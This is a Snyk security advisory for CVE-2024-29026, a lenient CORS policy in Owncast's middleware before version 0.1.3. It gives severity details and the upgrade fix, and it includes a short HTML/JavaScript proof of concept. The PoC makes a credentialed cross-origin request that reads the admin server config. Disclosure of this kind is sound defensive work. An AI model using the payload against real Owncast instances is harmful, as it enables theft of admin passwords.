Permissive Cross-domain Policy with Untrusted Domains Affecting github.com/owncast/owncast/router/middleware package, versions <0.1.3


Severity

Recommended
0.0
medium
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.09% (27th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-GOLANG-GITHUBCOMOWNCASTOWNCASTROUTERMIDDLEWARE-6474588
  • published21 Mar 2024
  • disclosed20 Mar 2024
  • creditKevin Stubbings

Introduced: 20 Mar 2024

CVE-2024-29026  (opens in a new tab)
CWE-942  (opens in a new tab)

How to fix?

Upgrade github.com/owncast/owncast/router/middleware to version 0.1.3 or higher.

Overview

Affected versions of this package are vulnerable to Permissive Cross-domain Policy with Untrusted Domains due to a lenient CORS policy that allows attackers to make a cross-origin request, reading privileged information. This can be used to leak the admin password.

PoC

<html>
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        alert(xhr.responseText);
    }
}
xhr.open('GET', 'http://owncast.domain/api/admin/serverconfig', true);
xhr.withCredentials = true;
xhr.send(null);
</script>
</body>
</html>

CVSS Base Scores

version 3.1